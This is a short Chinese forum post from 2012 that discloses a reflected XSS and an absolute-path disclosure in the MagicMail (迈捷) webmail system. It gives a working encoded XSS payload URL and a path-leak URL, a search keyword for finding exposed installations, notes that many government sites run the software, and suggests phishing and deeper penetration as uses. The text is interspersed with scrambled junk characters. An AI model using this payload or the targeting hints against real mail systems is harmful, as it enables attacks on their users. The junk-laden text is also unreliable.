今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
4 R) k* V0 ^; d) g5 r+ |* W I, x; x6 q* F
' U1 M, c: \' ]: H) X
包含 一个反射性XSS 以及 绝对路径泄漏4 D# U2 B% E2 }) g5 m& p
看了看 貌似全部是linux的。/ V# ^( _, O0 s9 ]+ g
, p G6 |7 t) {9 h$ F关键字:迈捷邮件系统 by MagicMail0 w% l8 B* @; x8 ~
% m& \; T! K6 ]9 j [可以看到很多政府网站都用这个邮件系统& O* l( P) c/ i8 ]2 ]0 k; N/ `
) u+ G1 g) K% X P/ w2 l! I- w. k: M: t
绝对路径 http://madman.in/index.php?login_type=declare&language=: {4 A! u' d5 n$ q' [2 C& O9 [* a; W
+ S- N. B6 n0 v3 R3 U- d/ h- G# {+ I0 F
4 l* f* ^: G3 Z; z- K
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E$ }& O" R* a! U, U- M
2 P3 s7 B! E8 M% E& y) \
( Y1 f: j2 B' b3 z$ z l/ e9 n- {, f; k% |" I6 o: C3 k7 b5 c
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
+ g ]/ W5 p) r( w* f* L" n/ r : J4 G% u9 e" E. x7 F
修复方案:看官方补丁吧。
# `% G. E4 U) X2 c |
发表于 2012-11-9 20:38:41
收藏
支持
反对